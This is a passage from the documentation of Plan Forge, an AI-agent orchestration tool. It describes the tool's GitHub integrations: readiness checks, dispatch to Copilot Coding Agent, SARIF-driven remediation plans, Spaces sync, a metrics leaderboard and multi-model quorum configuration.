GitHub Actions	Plan Forge plans can run as Actions workflows; `pforge run-plan` is callable from any runner. CCA itself runs in Actions and Plan Forge plans dispatched via CCA inherit Actions concurrency, runners, and minutes	`action.yml`
GitHub Advanced Security	Plan Forge's `forge_secret_scan`, `forge_dep_watch`, and security-audit skill complement GHAS, not replace it. Plan Forge surfaces GHAS findings into plan-aware bug reports	`pforge-mcp/notifications/`, `dependency-reviewer.agent.md`
Copilot Spaces	Plan Forge plan files + Scope Contract are the equivalent concept for autonomous execution. Spaces serves chat-side context curation; Plan Forge serves execution-time scope binding	docs reference
Copilot Metrics API	Plan Forge does not duplicate it. Plan Forge surfaces quality metrics (gate failure rates, drift scores, plan-adherence, regressions caught at gate boundary, cost per merged PR) that the Metrics API explicitly does not	`forge_health_trend`, `forge_drift_report`, `forge_cost_report`
Copilot SDK	Plan Forge does not embed the Copilot runtime. Plan Forge orchestrates across multiple agent runtimes (CCA, Claude Code, Codex, custom workers). The SDK is the right tool when you want to embed a single agent in your app; Plan Forge is the right tool when you want to coordinate many agent runs as a delivery pipeline	architecture reference
Custom properties	Plan Forge documents the recommended custom-property schema for governing per-team Plan Forge enablement, plan templates, and budget caps	`templates/docs/CUSTOMIZATION.md`
Org runner controls	Plan Forge dispatched plans inherit the org's runner policy. No conflict, no override needed	docs reference

Why this matters for the consolidation thesis

If your strategic direction is "consolidate on GitHub Enterprise + Copilot Enterprise," Plan Forge reinforces that choice rather than competing with it.

Cursor and Sourcegraph Amp are platform-agnostic by design. They work as well on GitLab and Bitbucket as on GitHub. Adopting them does not strengthen your GitHub investment.
GitHub Copilot Cloud Agent shipped the substrate but explicitly leaves orchestration to the ecosystem. Without an orchestration layer, the substrate is incomplete for fleet rollouts.
Plan Forge is the only project in the comparison set built specifically to extend GitHub primitives in the direction GitHub itself signaled is the ecosystem's lane. The architecture is a deliberate "yes, and" to GitHub's stack.

For Microsoft-shop enterprises pursuing the GitHub-native consolidation thesis, this is the cleanest path: GitHub for the substrate, Plan Forge for the orchestration layer, no third vendor in the picture.

Variations for Microsoft Foundry shops

For customers using Microsoft Foundry (Azure OpenAI, Foundry Agent Service, Foundry Toolboxes), Plan Forge composes additionally with:

Azure OpenAI as a first-class LLM provider (alongside GitHub Copilot, Anthropic, OpenAI, xAI). Auth via Entra ID (recommended), API key, or managed identity. Endpoint format https://{resource}.openai.azure.com/openai/v1/. Customer configures deployment names, not model families.
Foundry Toolboxes as MCP-compatible endpoints. Plan Forge already speaks MCP; pointing .vscode/mcp.json at a Foundry Toolbox endpoint is config, not code.
Foundry App Insights as the OTel sink. Plan Forge OTel traces land in the same dashboards as the customer's Foundry agent runs.

See Reference Architecture — Microsoft Foundry variant for the full picture.

Explore deeper

If the four pillars and the picture earned a closer look, jump straight to the chapters that go deep. Grouped for shoppers, builders, and operators.

Get started

Core concepts

Operate & observe

Architecture & deploy

GitHub stack alignment

Reference

… and more. Browse the full manual book index or the quick reference for everything.

A glowing octopus made of golden ember particles emerging from an anvil, surrounded by floating GitHub-native icons (Copilot wings, MCP hex, AGENTS.md scroll, Skills gear with chain)

Appendix I

Plan Forge on the GitHub Stack

A tour of the GitHub-native primitives Plan Forge integrates with, plus the readiness check for your repo.

When to read this chapter: you are running (or considering) Plan Forge against a repository hosted on GitHub, with GitHub Copilot, Copilot Coding Agent, GHAS, or Copilot Spaces in the picture.

When to skip it: you are on Bitbucket, GitLab, Azure DevOps, or anywhere else. None of this is required by Plan Forge, see Appendix C: Stack-Specific Notes for language-preset details, and Chapter 12: Extensions for the OSS extension surface.

Looking for the strategic framing instead? See Appendix H — GitHub Stack Alignment for the four-band AI SDLC stack diagram, the four harness pillars in plain English, the six outcome KPIs, and the consolidation thesis. This appendix (I) is the surface-by-surface technical reference; H is the executive-level companion.

Plan Forge does not require GitHub. It runs against any repo, with any agent (Copilot, Claude Code, Cursor, Codex), and against any CI system. But when the repo is on GitHub, Plan Forge has the deepest stack of integrations, eight first-class primitives it consumes today, plus several it dispatches to. This appendix is the single canonical reference for that integration surface.

Section 1 is the readiness check, a one-command snapshot of which GitHub primitives your repo currently has wired up. Section 2 is the surface-by-surface tour. Sections 3 (Copilot Coding Agent dispatch), 4 (GHAS remediation chains), 5 (Copilot Spaces sync), 6 (Metrics API leaderboard), 7 (BYOK and the multi-model picker), and 8 (other agent platforms: Claude Code, Cursor, Codex) are now live.

1. Is your repo set up? Run `pforge github status`

The fastest way to know which GitHub-native primitives Plan Forge can use against your repo is the introspection command:

pforge github status

Output is a checklist of the eight default checks, each marked with a glyph:

✓ pass, primitive is wired up correctly
⚠ warn, primitive is partially wired or recommended-but-missing
✗ fail, primitive is missing and Plan Forge integration depends on it
⊘ n/a, primitive does not apply to this repo (e.g. not a git clone)

Sample output, run against the Plan Forge repository itself:

GitHub stack readiness, E:\GitHub\Plan Forge
────────────────────────────────────────────────────────────────────────
  ✓ .github/copilot-instructions.md
      present
  ⚠ AGENTS.md
      missing, open agent standard not adopted
  ✓ .github/instructions/*.instructions.md
      7 instruction files found
  ✓ .github/prompts/*.prompt.md
      8 prompt files found
  ✓ .vscode/mcp.json
      Plan Forge MCP server registered
  ✓ .github/workflows/
      4 workflow files found
  ✓ git remote → github.com
      github.com remote configured
  ✓ gh CLI on PATH
      gh CLI available
────────────────────────────────────────────────────────────────────────
  7 pass · 1 warn · 0 fail · 0 n/a  (8 checks)

And against the Plan Forge testbed (a sample repo set up via setup.ps1):

Terminal output of pforge github status against the Plan Forge testbed showing 7 pass, 1 warn, 0 fail, 0 n/a across 8 checks — `pforge github status` against the Plan Forge testbed, generated by `scripts/capture-github-status-screenshot.mjs`.

To get fix hints for every ⚠ and ✗ row, use the doctor subcommand:

pforge github doctor

For machine-readable output (e.g. piping into a dashboard or another tool), add --json:

pforge github status --json

The JSON shape is stable and documented in the MCP Server Reference under forge_github_status. Two extra SHOULD-tier checks (instruction-file applyTo: usage, copilot-instructions length) run when you add --extra.

Exit codes

Code	Meaning
`0`	No ✗ fail rows. Warns and N/A are allowed.
`1`	At least one ✗ fail row.
`2`	Invalid arguments to the CLI.

This makes the command CI-friendly: a workflow can fail-fast on missing primitives, or treat warnings as advisory only.

From an MCP client (Copilot Chat, Claude Code, Cursor)

The same checklist is exposed as the forge_github_status MCP tool. From an in-IDE chat:

"Run forge_github_status on this repo and tell me which GitHub primitives I'm missing."

The agent receives the structured JSON and can answer with line-level precision, useful when you're evaluating Plan Forge inside an existing repo and don't want to leave the IDE.

2. The eight GitHub-native primitives Plan Forge consumes

Each row below is one check from pforge github status. The "What Plan Forge does with it" column is what makes this chapter different from the GitHub docs: it tells you exactly how Plan Forge uses the primitive, and which Plan Forge feature stops working if you remove it.

Primitive	What it is	What Plan Forge does with it
`.github/copilot-instructions.md`	Repo-wide context Copilot Chat reads on every conversation.	Generated by `setup.ps1` / `setup.sh`. Plan Forge writes the project overview, architecture summary, quick-command reference, and pipeline reference here. Re-generated by `pforge update` while preserving customizations.
`AGENTS.md`	Open standard adopted by Cursor, Codex, OpenAI, Anthropic, and GitHub for cross-agent context.	Generated alongside `copilot-instructions.md`. Lets Plan Forge support BYOK, the same context surface works whether the user picks Copilot, Cursor, Claude Code, or Codex.
`.github/instructions/*.instructions.md`	Path-scoped Copilot instructions (each file's `applyTo:` frontmatter targets a glob).	Plan Forge ships ~17 instruction files: `architecture-principles`, `git-workflow`, `testing`, `security`, `database`, etc. Each auto-loads when Copilot edits a matching file. The Step-2 Plan Hardener and Step-5 Reviewer reference these directly.
`.github/prompts/*.prompt.md`	Reusable prompt files Copilot Chat can invoke as slash commands.	Plan Forge ships the pipeline prompts: `step0-specify-feature`, `step1-preflight-check`, `step2-harden-plan`, `step3-execute-slice`, `step4-completeness-sweep`, `step5-review-gate`. The full Plan Forge pipeline runs through these in sequence.
`.vscode/mcp.json`	VS Code's MCP-server registry. Each entry exposes a server's tools to Copilot Chat.	Plan Forge registers itself here as `plan-forge`, exposing 102 MCP tools (`forge_run_plan`, `forge_estimate_quorum`, `forge_cost_report`, `forge_github_status`, `forge_lattice_query`, `forge_sync_memories`, …). See MCP Server Quick Start.
`.github/workflows/`	GitHub Actions, the CI surface.	Validation gates from Plan Forge plans can run as GitHub Actions jobs. The `regression-guard` command is designed to be triggered from a workflow on every PR. A future release will add an Actions composite for one-step Plan Forge dispatch.
git remote → github.com	Repository hosted on GitHub.	Pre-requisite for everything in Sections 3+: Copilot Coding Agent dispatch (creates issues + PRs against the repo), GHAS API access, Spaces sync, Metrics API ingestion. Without a github.com remote those features have no target.
GitHub CLI (`gh`)	GitHub's official command-line tool for issues, PRs, releases, and GHAS.	Plan Forge prefers `gh` for any GitHub API operation when it's installed (auth is already handled). Strict requirement for the SARIF ingestion command and for one-shot issue creation in `pforge run-plan --worker copilot-coding-agent`.

A note on optionality: not having every row green does not break Plan Forge. It limits which Plan Forge features are available. The CLI still runs end-to-end against any repo with any agent, the GitHub primitives give you the deepest, most automated path.

Five-layer architecture diagram showing how Plan Forge sits on top of the eight GitHub-native primitives (Layer 3) and dispatches to multiple agent runtimes (Layer 2) backed by any model (Layer 1), producing plan files, trajectories, and live GitHub artifacts (Layer 5). — The five-layer view. Plan Forge's orchestration layer (amber) consumes the eight GitHub primitives below and produces working artifacts above. Every primitive is documented in this chapter, every Plan Forge feature in the amber band has a section below.

3. Dispatching to Copilot Coding Agent

When your repo is hosted on GitHub and has Copilot Coding Agent enabled, Plan Forge can hand each slice of a plan off to the Coding Agent automatically, creating a GitHub Issue per slice, assigning it to @copilot, polling the resulting PR, and capturing the run trajectory back into the Plan Forge dashboard.

pforge run-plan --worker copilot-coding-agent docs/plans/my-feature-PLAN.md

The --worker copilot-coding-agent flag replaces the default in-process execution loop with the GitHub dispatch loop. Every other flag (--quorum, --estimate, --resume-from) works unchanged.

Issue body template — canonical vs per-stack

Each slice becomes a GitHub Issue. The body is assembled from two sources:

Canonical block, always present. Contains the slice title, scope contract, validation gate commands, and a reference to the plan file. This block is the same regardless of which tech stack the project uses.
Per-stack block, injected when a .github/instructions/project-profile.instructions.md exists. Appends the project's language, framework, test runner, and any Forbidden Actions so the Coding Agent has immediate context without reading the full plan.

The canonical block is produced by pforge-mcp/coding-agent-dispatch.mjs. The per-stack block is read from project-profile.instructions.md if present; if the file is absent, the block is silently omitted. You can inspect the issue body before creating it:

pforge run-plan --worker copilot-coding-agent --dry-run docs/plans/my-feature-PLAN.md

The --dry-run flag prints the would-be issue body for each slice and exits without touching GitHub.

PR detection — linked-issue search, branch pattern, fallback order

After creating the issue and assigning it to @copilot, Plan Forge polls for the resulting PR. It uses a two-stage fallback:

Stage	Strategy	How it works
1 (primary)	Linked-issue search	`gh pr list --search "closes #<issue-number>"`, matches PRs that reference the issue in their body. Works reliably when the Coding Agent follows GitHub's "closes" keyword convention.
2 (fallback)	Branch pattern	Scans open PRs whose branch name contains `copilot/` or the slugified slice title. Used when the agent opens a PR without a closes link (rare, but observed in edge cases).

If neither stage finds a PR within the configured timeout (default: 30 minutes, configurable via .forge.json#codingAgent.pollTimeoutMinutes), the slice is marked stalled and Plan Forge moves to the next slice or stops, depending on --on-stall (skip | abort, default abort).

Trajectory capture

When a PR is merged, Plan Forge fetches the Coding Agent's session log from the PR's Copilot Activity tab via the GitHub API and appends it to the plan's trajectory file at .forge/trajectories/<plan-slug>.jsonl. This makes the Coding Agent's reasoning searchable by pforge timeline and forge_master_ask just like any other execution session.

Pre-flight checks

Before Plan Forge creates any GitHub Issues for a --worker copilot-coding-agent run, it executes a pre-flight check that includes the copilot-coding-agent-assignable probe. This probe calls the GitHub Assignees API to verify that @copilot is an assignable user on the repository. If it is not, typically because Copilot Coding Agent has not been enabled at the org or repo level, the orchestrator stops immediately with a fix-hint rather than creating issues that will never be picked up.

The probe has three return states:

Status	Meaning	Action taken by orchestrator
pass	`@copilot` is assignable on this repo, Copilot Coding Agent is enabled and ready.	Pre-flight continues; slice execution proceeds normally.
warn	Copilot Coding Agent is not enabled, `--assignee @copilot` would be silently dropped.	Promoted to a hard fail. Execution stops before any issue is created. Fix-hint links to GitHub's docs for enabling Copilot Coding Agent at the repo or org level.
fail	API error, token lacks `repo` scope, network unreachable, or GitHub returned 4xx/5xx.	Execution stops. Fix-hint describes the token scope requirement and suggests `gh auth status`.

You can run the probe manually via pforge github status with --gh-token:

pforge github status --gh-token

Without --gh-token, the check returns na ("skipped, pass --gh-token to probe") and does not make any API calls. The probe is intentionally opt-in on the status command to keep the hot path free of network I/O, but it always runs automatically when the orchestrator's pre-flight fires for a --worker copilot-coding-agent dispatch.

Prerequisite: gh CLI must be authenticated (gh auth status) and the repo must have Copilot Coding Agent enabled at the org or repo level. Run pforge github status --gh-token, all checks including copilot-coding-agent-assignable should pass before using --worker copilot-coding-agent.

4. GHAS-driven remediation

GitHub Advanced Security (GHAS) surfaces security findings, CodeQL alerts, secret scans, Dependabot advisories, as SARIF files or API responses. pforge plan-from-sarif turns a SARIF result into a runnable Plan Forge plan with one slice per finding, severity-ordered so the highest-severity issues execute first.

pforge plan-from-sarif codeql-results.sarif --out docs/plans/ghas-remediation-PLAN.md

The generated plan is a standard Plan Forge plan. Run it with any worker (pforge run-plan, --worker copilot-coding-agent, etc.) and all the usual flags apply.

Reading SARIF from stdin

Pass - as the file argument to read SARIF from stdin. This lets you pipe directly from gh or any SARIF producer without writing an intermediate file:

# Pipe CodeQL results from the GitHub API
gh api /repos/{owner}/{repo}/code-scanning/analyses/latest/sarif | \
  pforge plan-from-sarif - --out docs/plans/ghas-remediation-PLAN.md

# Or from a local CodeQL database run
codeql database analyze my-db --format=sarifv2.1.0 --output=- | \
  pforge plan-from-sarif - --out docs/plans/ghas-remediation-PLAN.md

Severity ordering and slice structure

Findings are sorted by SARIF level in descending order, error → warning → note, then by rule ID for deterministic ordering within a level. Each finding becomes one slice with:

Slice title: [SARIF] <ruleId>, <location>
Scope contract: the finding's message, the affected file and line range, and the recommended fix from the rule metadata (if present)
Validation gate: re-runs CodeQL on the affected file and asserts zero findings for that rule

Use --min-severity warning to exclude note-level findings from the plan. Use --rule-filter <ruleId> to include only a specific rule. Both flags can be combined.

Integration with the Plan Forge security surface

pforge plan-from-sarif is the inbound half of the GHAS integration. The outbound half is the existing PreDeploy LiveGuard hook: before any deploy slice executes, forge_secret_scan + forge_env_diff run automatically and block on severity ≥ high. The /security-audit skill combines both: it invokes pforge plan-from-sarif against the latest SARIF, presents the generated plan for review, then hands off to pforge run-plan.

"Run /security-audit and generate a remediation plan for all high-severity CodeQL findings."

That one prompt triggers the full pipeline: SARIF fetch → plan generation → plan review → optional execution. See the Skills Reference for the full /security-audit flow.

5. Copilot Spaces sync

Copilot Spaces is GitHub's team-scoped knowledge hub, a curated collection of files, instructions, and context that Copilot Chat draws from automatically when a Space is selected. Plan Forge integrates with Spaces via pforge sync-spaces: a single command that pushes the active plan, instruction files, and Plan Forge tool catalog into a designated Space, giving every chat session in the org instant access to the current plan state without manual copy-paste.

pforge sync-spaces

By default this targets the Space named plan-forge in the same org as the repo's git remote. Override with --space <owner/name>. For org-wide broadcast, use --org <slug> to push to every Space in the org that has the plan-forge-sync topic tag.

What gets synced

pforge sync-spaces builds a payload from four sources and uploads them as versioned Space files:

Source	Space path	Update frequency
Active plan file (the one matching `.forge/active-plan`)	`plan-forge/active-plan.md`	Every sync
All `.github/instructions/*.instructions.md` files	`plan-forge/instructions/<name>.md`	Only when file hash changes
MCP tool catalog (`forge_capabilities` snapshot)	`plan-forge/tool-catalog.md`	Only when version changes
Project profile (`.github/instructions/project-profile.instructions.md` if present)	`plan-forge/project-profile.md`	Only when file hash changes

Files are uploaded using the GitHub Spaces API authenticated via the gh CLI, run gh auth status before your first sync. Unchanged files (same SHA-256) are skipped to stay within API rate limits.

Flags

Flag	Default	Effect
`--space <owner/name>`	Inferred from remote + `.forge.json`	Target a specific Space by owner and name.
`--org <slug>`	(single repo Space)	Broadcast to all Spaces in the org tagged `plan-forge-sync`.
`--dry-run`	(off)	Print what would be uploaded without making API calls.
`--force`	(off)	Re-upload all files even if SHA-256 matches.
`--no-instructions`	(instructions included)	Skip the `.github/instructions/` payload. Useful when the Space already has a curated instruction set you don't want overwritten.

The AI-SDLC-Hub pattern

Many enterprise readouts describe an "AI-SDLC-Hub", a single Space that every developer in the org selects by default, giving all Copilot Chat sessions a shared view of the team's architecture decisions, coding standards, and active delivery plan. pforge sync-spaces is the automation layer for that pattern: instead of a human curating the Space manually, the hub is kept current by a scheduled CI job or a post-commit hook.

A minimal GitHub Actions workflow to sync on every push to main:

name: Plan Forge Spaces Sync
on:
  push:
    branches: [main]
    paths:
      - 'docs/plans/**'
      - '.github/instructions/**'
      - '.forge.json'

jobs:
  sync:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with: { node-version: '20' }
      - run: npm install -g plan-forge
      - run: pforge sync-spaces --space ${{ vars.PFORGE_SPACES_TARGET }}
        env:
          GH_TOKEN: ${{ secrets.PFORGE_SPACES_TOKEN }}

Store the target Space name as a repository variable (PFORGE_SPACES_TARGET) and the gh-compatible token as a secret. The token needs copilot_spaces:write scope.

Persisting the target Space

To avoid specifying --space on every invocation, write the target into .forge.json:

{
  "github": {
    "spacesTarget": "acme-org/plan-forge-hub"
  }
}

pforge sync-spaces reads this field and uses it as the default target. The field can also be set via the CLI:

pforge config set github.spacesTarget acme-org/plan-forge-hub

Roadmap

The current release ships the core sync path: plan, instructions, tool catalog, and project profile. A future release will add bidirectional sync, pulling conversation summaries and noteworthy Q&A threads from the Space back into the Plan Forge timeline so decision rationale captured in chat is preserved alongside the plan execution history. The pforge github status readiness check will also gain a dedicated Spaces row at that point.

Prerequisite: gh CLI must be authenticated (gh auth status) and the target Copilot Space must exist before the first sync. Create a Space at github.com/copilot/spaces and note the owner/name slug. Run pforge github status to verify the rest of the GitHub stack readiness.

6. Metrics API + Plan Forge unified leaderboard

The Copilot Metrics API (available at the org and enterprise level via gh api /orgs/{org}/copilot/metrics) surfaces AI-assisted PR rate, code-suggestion acceptance, and code-review usage across your teams. Plan Forge pulls that data alongside its own plan-execution metrics, slices shipped, MTTR, drift rate, and presents them in a single leaderboard view on the dashboard.

Pulling Metrics API data

Fetch and cache the latest Copilot Metrics API payload with:

pforge github metrics pull

By default this targets the org inferred from git remote get-url origin. Override with --org <name>. For enterprise-level metrics, use --enterprise <slug>. The pull authenticates via the gh CLI, run gh auth status first if you see a 401.

Additional flags:

Flag	Default	Effect
`--team <slug>`	(all teams)	Filter to a single team slug. Repeatable for multiple teams.
`--since <ISO-date>`	30 days ago	Start of the pull window. Metrics API returns daily buckets.
`--out <path>`	`.forge/metrics/copilot-<date>.jsonl`	Override the output path. Use `-` to print to stdout.
`--no-cache`	(cache enabled)	Force a fresh API fetch even if a cached response exists.

JSONL schema and schema versioning

Each line written to .forge/metrics/ is a JSON object with a stable _schema field so downstream consumers (dashboards, CI scripts, forge_github_metrics) can handle forward evolution without breakage:

{
  "_schema": "copilot-metrics/v1",
  "date": "2026-05-05",
  "org": "acme",
  "team": "platform",
  "ai_pr_rate": 0.74,
  "acceptance_rate": 0.61,
  "code_review_usage": 0.43,
  "active_users": 18,
  "_pulled_at": "2026-05-05T11:00:00Z"
}

The schema version follows <namespace>/v<N>. A bump to v2 will only happen when a field is removed or renamed, adding fields is non-breaking. Consumers should read _schema and warn (not crash) on unknown versions. The pforge-mcp/metrics-schema.mjs module exports CURRENT_SCHEMA, validateRow(row), and migrateRow(row) for any tool that reads the JSONL files.

Dashboard tab placement — Forge group vs GitHub group

The dashboard sidebar organises tabs into two groups:

Forge group, tabs sourced entirely from Plan Forge data: Timeline, Cost, Forge Master, Digest. These work offline and do not require a GitHub connection.
GitHub group, tabs that join Plan Forge data with GitHub API data: Metrics Leaderboard (this section) and, in a future release, Spaces. These tabs show a "Connect GitHub" prompt when gh auth status returns non-zero or no pull has been run yet.

The Metrics Leaderboard tab sits at the top of the GitHub group. It renders a table of teams ranked by a composite score, a weighted blend of AI-assisted PR rate (40 %), acceptance rate (40 %), and code-review usage (20 %), next to their Plan Forge plan-completion rate for the same window. Hovering a row reveals the raw daily time-series chart.

Tab group placement is controlled by the group field in pforge-mcp/dashboard/tab-registry.mjs. Tabs with group: "github" are hidden when the GitHub group is collapsed (the user preference persists in localStorage).

Readiness widget (v2.90.8). The top of the Metrics Leaderboard tab now renders a compact readiness widget that mirrors the eight checks from pforge github status as coloured glyphs. When all eight checks pass the widget collapses to a single ✓ summary line to keep the leaderboard table in view. The widget is served by the new GET /api/github/readiness endpoint and refreshes automatically when the MCP server restarts or when pforge github status writes a new snapshot to .forge/github-status.json.

The `forge_github_metrics` MCP tool

forge_github_metrics exposes the leaderboard data to any MCP client (Copilot Chat, Claude Code, Cursor). It reads from the cached JSONL in .forge/metrics/, it never calls the GitHub API directly, so it works offline and in air-gapped environments after an initial pull.

// In Copilot Chat or any MCP client:
forge_github_metrics({ team: "platform", since: "2026-04-01" })

Input schema:

Field	Type	Default	Description
`team`	string \| string[]	(all teams)	Filter by team slug(s).
`since`	ISO date string	30 days ago	Start of the aggregation window.
`metric`	"all" \| "ai_pr_rate" \| "acceptance_rate" \| "code_review_usage"	"all"	Return only the specified metric column.
`format`	"leaderboard" \| "timeseries" \| "raw"	"leaderboard"	`leaderboard` = ranked table; `timeseries` = per-team daily arrays; `raw` = unprocessed JSONL rows.

The tool is registered in pforge-mcp/server.mjs alongside forge_github_status and is listed in pforge-mcp/tools.json. It is included in the Plan Forge MCP server entry in .vscode/mcp.json without requiring a separate setup run, the tool registration is additive and picked up on the next MCP server restart.

Cache TTL for the dashboard endpoint

The dashboard's GET /api/metrics/leaderboard endpoint serves the aggregated leaderboard from the on-disk JSONL cache. It does not proxy the GitHub API on demand. Cache staleness is controlled by two settings in .forge.json:

{
  "metrics": {
    "cacheTtlMinutes": 60,
    "staleWarningMinutes": 480
  }
}

cacheTtlMinutes (default: 60), the dashboard appends a Cache-Control: max-age=<N×60> header. Browsers and CDNs respect this. In-process in-memory cache is also flushed after this window, so a fresh request re-reads from disk.
staleWarningMinutes (default: 480 = 8 hours), if the newest JSONL row is older than this, the leaderboard tab shows a ⚠ Data may be stale banner with the age and a one-click Re-pull button that runs pforge github metrics pull in the background.

Set cacheTtlMinutes: 0 to disable the in-memory cache entirely (reads from disk on every request). Useful in CI environments where the JSONL files are updated by a scheduled workflow and you want every page load to reflect the latest data.

Per-team join key precedence

The leaderboard joins Metrics API rows (keyed by GitHub team slug) with Plan Forge plan-completion rows (keyed by the team field in the plan frontmatter). In practice these two key spaces often diverge, a GitHub team might be platform-eng while the plan frontmatter uses platform.

Plan Forge resolves the join using the following precedence order:

Explicit mapping in .forge.json#metrics.teamMap, highest precedence. Map GitHub team slugs to plan team labels:

{
  "metrics": {
    "teamMap": {
      "platform-eng": "platform",
      "fe-core":       "frontend"
    }
  }
}

Slug normalisation, if no explicit mapping exists, Plan Forge applies a normaliser: lowercase, strip trailing -eng / -team / -squad, replace hyphens with underscores. If the normalised forms match, the rows are joined.
Exact match, if normalisation still doesn't produce a match, the rows are left unjoined. Metrics API rows without a plan partner appear in the leaderboard with plan-side columns as —, and vice versa. No silent data loss; mismatches are surfaced explicitly.

Run pforge github metrics pull --dry-run to see a join-preview table: every Metrics API team slug listed next to the plan team label it resolves to, and a no match flag for unresolved rows. This makes it easy to build up the teamMap incrementally.

Prerequisite: gh CLI must be authenticated (gh auth status) and the repo's org must have Copilot Metrics API access enabled (requires GitHub Copilot Business or Enterprise). Run pforge github status to verify the GitHub stack readiness before pulling metrics.

7. BYOK and the multi-model picker

GitHub Copilot ships a built-in multi-model picker that lets individual developers switch between supported models (GPT-4o, Claude Sonnet, Gemini, and others) inside their editor. Plan Forge has its own orthogonal model-selection surface: the --model flag and the quorum system. This section explains how the two compose, when BYOK (bring-your-own-key) matters, and when the picker is enough.

The `--model` flag

Every plan-execution command accepts a --model flag that overrides the default model for the entire run:

pforge run-plan docs/plans/Phase-28-PLAN.md --model gpt-4.1
pforge run-plan docs/plans/Phase-28-PLAN.md --model claude-sonnet-4.5
pforge run-plan docs/plans/Phase-28-PLAN.md --model grok-3

The value is forwarded to the Forge-Master reasoning layer (pforge-master/src/reasoning.mjs), which resolves it against the configured provider table in .forge.json#providers. If no provider entry exists for the requested model, Forge-Master falls back to the default provider and logs a warn event to the timeline.

The flag is independent of the Copilot multi-model picker. A developer can have GPT-4o selected in their editor picker while Plan Forge runs a plan with --model claude-sonnet-4.5. The two selections do not interfere, Copilot Chat and Plan Forge use separate request paths.

Quorum modes: `auto`, `power`, `speed`, and `false`

For high-stakes slices, deploy steps, schema migrations, security patches, Plan Forge can run the same slice prompt across multiple models and require a threshold of agreement before committing. This is the quorum system.

pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=power   # flagship models, threshold 5
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=speed   # fast models, threshold 7
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=auto    # Plan Forge picks mode per slice
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=false   # disable quorum entirely

Mode	Models polled	Agreement threshold	Best for
`power`	Up to 3 flagship models (GPT-5, Claude Opus, Grok-4)	5 / 7 points	Deploy slices, schema migrations
`speed`	Up to 3 fast models (GPT-4.1, Claude Haiku, Grok-3-mini)	7 / 7 points	High-volume code generation, CI budget caps
`auto`	Plan Forge selects per slice based on slice risk tags	Per-slice	Mixed plans; recommended default
`false`	Single model only	N/A	Local development, cost sensitivity

Cost estimates for each mode are available before you run by calling forge_estimate_quorum (MCP) or running:

pforge run-plan --estimate docs/plans/Phase-28-PLAN.md

This prints a projected cost breakdown under each of the four quorum modes, sourced from the live token-price table in pforge-mcp/cost/price-table.mjs, not hand-computed approximations.

When BYOK matters

BYOK is the practice of supplying your own API key directly to a model provider rather than routing through GitHub Copilot's proxy. Plan Forge supports BYOK for any provider that exposes an OpenAI-compatible endpoint. Set the key in .forge/secrets.json (gitignored) or via environment variable:

# .forge/secrets.json (gitignored)
{
  "XAI_API_KEY": "xai-...",
  "ANTHROPIC_API_KEY": "sk-ant-...",
  "OPENAI_API_KEY": "sk-..."
}

# Or as environment variables:
export XAI_API_KEY=xai-...
pforge run-plan docs/plans/Phase-28-PLAN.md --model grok-4

BYOK matters in the following situations:

Model not in the Copilot picker, Grok-4, Grok-3, and Grok-3-mini are only reachable via direct xAI keys today. Set XAI_API_KEY and they become available to --model and quorum.
Higher rate limits, a GitHub Copilot Business seat has shared rate-limit headroom. Direct BYOK keys give dedicated limits. In heavy quorum runs (power mode across three flagship models), hitting the shared rate limit stalls the run. BYOK avoids the contention.
Data-residency or audit requirements, some organisations route only approved models through the Copilot proxy for compliance. BYOK lets the remainder go direct without touching the proxy at all.
Cost arbitrage, the Copilot Business per-seat fee is often cheaper per token for everyday chat, but a heavy automated quorum run on flagship models may be cheaper billed direct at volume pricing. Run pforge run-plan --estimate to compare.

Copilot picker vs Plan Forge model selection: the short answer

The Copilot multi-model picker is the right tool when a human developer is choosing a model interactively for chat or inline suggestions. Plan Forge model selection (--model, quorum) is the right tool when an automated plan execution run needs reproducible, auditable model routing with cost tracking and agreement enforcement. The two are complementary:

During development, let the picker follow the developer's preference.
During pforge run-plan execution (CI or local), lock the model via --model or quorum so the run is reproducible across machines.
If both are unset, Forge-Master uses the provider priority list in .forge.json#providers. The Copilot picker setting has no effect on headless plan runs.

Provider configuration in `.forge.json`

The full provider table lives under .forge.json#providers. Each entry maps a model identifier to a provider, base URL, and optional per-model settings:

{
  "providers": {
    "default": "githubCopilot",
    "models": {
      "gpt-5.4":           { "provider": "githubCopilot" },
      "claude-sonnet-4.6": { "provider": "githubCopilot" },
      "grok-4":            { "provider": "xai",   "baseUrl": "https://api.x.ai/v1" },
      "grok-3":            { "provider": "xai",   "baseUrl": "https://api.x.ai/v1" },
      "grok-3-mini":       { "provider": "xai",   "baseUrl": "https://api.x.ai/v1" }
    }
  }
}

The internal provider key for GitHub Copilot is "githubCopilot" (not "github-copilot"). Using the wrong key causes selectProvider to return null and fall through to the default. Run pforge smith to validate your provider table and surface misconfiguration before a plan run.

Tip: Run pforge smith (forge environment diagnostics) and pforge github status together before any quorum run. smith validates the provider table and API keys; github status confirms the GitHub stack readiness. Both must pass before a power-quorum run on a deploy slice.

8. Other agent platforms (Claude Code, Cursor, Codex)

Plan Forge runs against any agent, not just GitHub Copilot. This section covers the three most common alternatives: Claude Code, Cursor, and Codex. For each platform it describes what works out of the box, what requires one extra step, and what is GitHub-only and therefore not available outside GitHub Copilot.

The honest framing is a depth-of-integration spectrum. Plan Forge has its deepest automated path on GitHub Copilot (Sections 1–7). The platforms below share the platform-independent subset of that surface, and each diverges in one or two specific areas. None of these gaps block Plan Forge from running end-to-end.

Cross-platform baseline — what works everywhere

Before covering the per-platform differences, here is the shared foundation that works identically on all four platforms (Copilot, Claude Code, Cursor, Codex):

Capability	How it works on any platform
`pforge run-plan` execution	The CLI dispatcher, quorum system, validation gates, and trajectory capture all run in-process. No agent platform is required, the CLI is the runtime.
`AGENTS.md` context	Generated by `setup.sh` / `setup.ps1` alongside `copilot-instructions.md`. All four platforms read `AGENTS.md` for project architecture, quick commands, and pipeline reference.
`.github/instructions/*.instructions.md`	Instruction files are referenced directly from plan prompts and the Step-2 hardener. The agent platform consuming the prompt sees them via file inclusion, regardless of which IDE or agent is active.
BYOK model selection	The `--model` flag and `.forge/secrets.json` API keys work the same on all platforms. Any agent can execute a plan run with any model.
MCP tools (where MCP is supported)	Claude Code and Cursor both support MCP. They can call `forge_run_plan`, `forge_analyze`, `forge_estimate_quorum`, and the other 102 MCP tools directly from chat. Codex does not support MCP today.

Claude Code

